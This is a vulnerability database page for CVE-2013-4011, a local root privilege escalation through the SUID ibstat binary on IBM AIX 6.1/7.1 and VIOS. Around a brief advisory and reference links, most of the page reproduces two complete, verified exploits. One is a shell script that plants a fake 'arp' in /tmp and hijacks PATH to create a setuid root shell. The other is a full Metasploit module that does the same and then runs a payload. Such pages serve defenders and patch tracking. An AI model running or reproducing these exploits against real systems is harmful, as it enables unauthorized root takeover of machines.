CVE-2013-4011 : Detail

CVE-2013-4011

0.14% V3
Local
Published: 2013-07-18 14h00 +00:00
Last modified: 2017-09-18 10h57 +00:00

CVE Descriptions

Multiple unspecified vulnerabilities in the InfiniBand subsystem in IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02, allow local users to gain privileges via vectors involving (1) arp.ib or (2) ibstat.

CVE Information

Related Weaknesses

CWE-ID    Weakness Name    Source
CWE Other No information.

Metrics

Metrics  Score  Severity  CVSS Vector                    Source
V2       7.2              AV:L/AC:L/Au:N/C:C/I:C/A:C     [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 28507

Publication date : 2013-09-23 22h00 +00:00
Author : Kristian Erik Hermansen
EDB Verified : Yes

# Exploit-DB Note: Screenshot provided by exploit author
#
#!/bin/sh
# Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation
# Date: 2013-09-24
# Exploit Author: Kristian Erik Hermansen <[email protected]>
# Vendor Homepage: http://www.ibm.com
# Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html
# Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02
# Tested on: IBM AIX 6.1
# CVE: CVE-2013-4011

echo '
   mm   mmmmm  m    m
   ##     #     #  #
  #  #    #      ##
  #mm#    #     m""m
 #    # mm#mm  m"  "m
'
echo "[*] AIX root privilege escalation"
echo "[*] Kristian Erik Hermansen"
echo "[*] https://linkedin.com/in/kristianhermansen"
echo "
+++++?????????????~.:,.:+???????????++++
+++++???????????+...:.,.,.=??????????+++
+++???????????~.,:~=~:::..,.~?????????++
+++???????????:,~==++++==~,,.?????????++
+++???????????,:=+++++++=~:,,~????????++
++++?????????+,~~=++++++=~:,,:????????++
+++++????????~,~===~=+~,,::,:+???????+++
++++++???????=~===++~~~+,,~::???????++++
++++++++?????=~=+++~~~:++=~:~+???+++++++
+++++++++????~~=+++~+=~===~~:+??++++++++
+++++++++?????~~=====~~==~:,:?++++++++++
++++++++++????+~==:::::=~:,+??++++++++++
++++++++++?????:~~=~~~~~::,??+++++++++++
++++++++++?????=~:~===~,,,????++++++++++
++++++++++???+:==~:,,.:~~..+??++++++++++
+++++++++++....==+===~~=~,...=?+++++++++
++++++++,........~=====..........+++++++
+++++................................++=
=+:....................................=
"

TMPDIR=/tmp
TAINT=${TMPDIR}/arp
RSHELL=${TMPDIR}/r00t-sh

# Drop a script named "arp" that the SUID ibstat will pick up from a
# writable directory placed first in PATH.
cat > ${TAINT} <<-!
#!/bin/sh
cp /bin/sh ${RSHELL}
chown root ${RSHELL}
chmod 4555 ${RSHELL}
!
chmod 755 ${TAINT}

PATH=.:${PATH}
export PATH
cd ${TMPDIR}
/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null

if [ -e ${RSHELL} ]; then
  echo "[+] Access granted. Don't be evil..."
  ${RSHELL}
else
  echo "[-] Exploit failed. Try some 0day instead..."
fi
Exploit Database EDB-ID : 32700

Publication date : 2014-04-03 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class Metasploit4 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      "Name"        => "ibstat $PATH Privilege Escalation",
      "Description" => %q{
        This module exploits the trusted $PATH environment variable of the SUID binary "ibstat".
      },
      "Author"      => [
        "Kristian Erik Hermansen",                                    # original author
        "Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>",           # Metasploit module
        "Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>"  # Metasploit module
      ],
      "References"  => [
        ["CVE", "2013-4011"],
        ["OSVDB", "95420"],
        ["BID", "61287"],
        ["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827"],
        ["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756"]
      ],
      "Platform"    => ["unix"],
      "Arch"        => ARCH_CMD,
      "Payload"     => {
        "Compat" => {
          "PayloadType" => "cmd",
          "RequiredCmd" => "perl"
        }
      },
      "Targets"     => [
        ["IBM AIX Version 6.1", {}],
        ["IBM AIX Version 7.1", {}]
      ],
      "DefaultTarget"  => 1,
      "DisclosureDate" => "Sep 24 2013"
    ))

    register_options([
      OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
    ], self.class)
  end

  # Vulnerable if a root-owned SUID ibstat is present under /usr/sbin/.
  def check
    find_output = cmd_exec("find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null")
    if find_output.include?("ibstat")
      return Exploit::CheckCode::Vulnerable
    end
    Exploit::CheckCode::Safe
  end

  def exploit
    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    else
      print_good("Target is vulnerable.")
    end

    root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
    arp_file  = "#{datastore["WritableDir"]}/arp"

    c_file = %Q^#include <stdio.h>
int main() {
  setreuid(0,0);
  setregid(0,0);
  execve("/bin/sh",NULL,NULL);
  return 0;
}
^

    arp = %Q^#!/bin/sh
chown root #{root_file}
chmod 4555 #{root_file}
^

    if gcc_installed?
      print_status("Dropping file #{root_file}.c...")
      write_file("#{root_file}.c", c_file)
      print_status("Compiling source...")
      cmd_exec("gcc -o #{root_file} #{root_file}.c")
      print_status("Compilation completed")
      register_file_for_cleanup("#{root_file}.c")
    else
      cmd_exec("cp /bin/sh #{root_file}")
    end
    register_file_for_cleanup(root_file)

    print_status("Writing custom arp file...")
    write_file(arp_file, arp)
    register_file_for_cleanup(arp_file)
    cmd_exec("chmod 0555 #{arp_file}")
    print_status("Custom arp file written")

    print_status("Updating $PATH environment variable...")
    path_env = cmd_exec("echo $PATH")
    cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH")
    cmd_exec("export PATH")

    print_status("Triggering vulnerability...")
    cmd_exec("/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null")

    # The $PATH variable must be restored before the payload is executed
    # in cases where an euid root shell was gained
    print_status("Restoring $PATH environment variable...")
    cmd_exec("PATH=#{path_env}")
    cmd_exec("export PATH")

    cmd_exec(root_file)

    print_status("Checking root privileges...")
    if is_root?
      print_status("Executing payload...")
      cmd_exec(payload.encoded)
    end
  end

  def gcc_installed?
    print_status("Checking if gcc exists...")
    gcc_whereis_output = cmd_exec("whereis -b gcc")
    if gcc_whereis_output.include?("/")
      print_good("gcc found!")
      return true
    end
    print_status("gcc not found. Using /bin/sh from local system")
    false
  end

  def is_root?
    id_output = cmd_exec("id")
    if id_output.include?("euid=0(root)")
      print_good("Got root! (euid)")
      return true
    end
    if id_output.include?("uid=0(root)")
      print_good("Got root!")
      return true
    end
    print_status("Exploit failed")
    false
  end
end

Products Mentioned

Configuration 0

Ibm>>Aix >> Version 6.1

Ibm>>Aix >> Version 7.1

Ibm>>Vios >> Version 2.2.2.2

References

http://secunia.com/advisories/54215
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ibm.com/support/docview.wss?uid=isg1IV43562
Tags : vendor-advisory, x_refsource_AIXAPAR
http://www.securitytracker.com/id/1028792
Tags : vdb-entry, x_refsource_SECTRACK
http://www.ibm.com/support/docview.wss?uid=isg1IV43580
Tags : vendor-advisory, x_refsource_AIXAPAR
http://www.ibm.com/support/docview.wss?uid=isg1IV43827
Tags : vendor-advisory, x_refsource_AIXAPAR
http://osvdb.org/95419
Tags : vdb-entry, x_refsource_OSVDB
http://www.ibm.com/support/docview.wss?uid=isg1IV43561
Tags : vendor-advisory, x_refsource_AIXAPAR
http://osvdb.org/95420
Tags : vdb-entry, x_refsource_OSVDB
http://www.ibm.com/support/docview.wss?uid=isg1IV43582
Tags : vendor-advisory, x_refsource_AIXAPAR
http://www.ibm.com/support/docview.wss?uid=isg1IV43756
Tags : vendor-advisory, x_refsource_AIXAPAR
http://www.securityfocus.com/bid/61287
Tags : vdb-entry, x_refsource_BID